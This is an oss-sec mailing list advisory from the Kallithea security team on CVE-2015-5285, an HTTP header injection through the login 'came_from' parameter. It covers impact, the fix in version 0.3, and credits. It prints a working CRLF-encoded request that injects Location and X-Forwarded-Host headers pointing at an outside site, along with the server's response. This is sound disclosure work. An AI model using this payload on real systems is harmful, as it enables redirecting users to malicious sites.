oss-sec mailing list archives
CVE-2015-5285: Kallithea: HTTP header injection
From: Andrew Shadura <andrew () shadura me>
Date: Fri, 2 Oct 2015 22:13:01 +0200
HTTP header injection Synopsis ======== A vulnerability has been found in Kallithea, allowing attackers to inject arbitrary headers into the server response for certain URLs. Description =========== HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses. The vulnerability affects the `came_from` `GET` parameter. Example of a malicious request: GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1 Host: 192.168.0.28:8080 Content-Length: 0 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.0.28:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438 Corresponding response: HTTP/1.1 302 Found Cache-Control: no-cache Content-Length: 411 Content-Type: text/html; charset=UTF-8 Date: Mon, 21 Sep 2015 13:58:05 GMT Location: http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk Pragma: no-cache Server: waitress <html> <head> <title>302 Found</title> </head> <body> <h1>302 Found</h1> The resource was found at <a href="http://192.168.0.28:8080/_admin/1 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk </a>; you should be redirected automatically. </body> </html> Impact ====== The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or make other middleware misbehave when it trusts the response headers. Resolution ========== The Kallithea project has fixed this issue in the stable branch. Users are recommended to upgrade to the latest 0.3 release. Affected versions ================= The issue is present in Kallithea versions before 0.3. Acknowledgments =============== Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue. References ========== [0] Kallithea Project <https://kallithea-scm.org/> [1] CVE-2015-5285 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285> [2] Kallithea: Security Notice CVE-2015-5285 <https://kallithea-scm.org/security/cve-2015-5285.html> [3] Mercurial changeset fixing the issue <https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068> [4] Zero Science Lab <http://www.zeroscience.mk/en/> -- Cheers, Andrew Shadura on behalf of Kallithea Security Team
Attachment:
signature.asc
Description: OpenPGP digital signature
Current thread:
- CVE-2015-5285: Kallithea: HTTP header injection Andrew Shadura (Oct 02)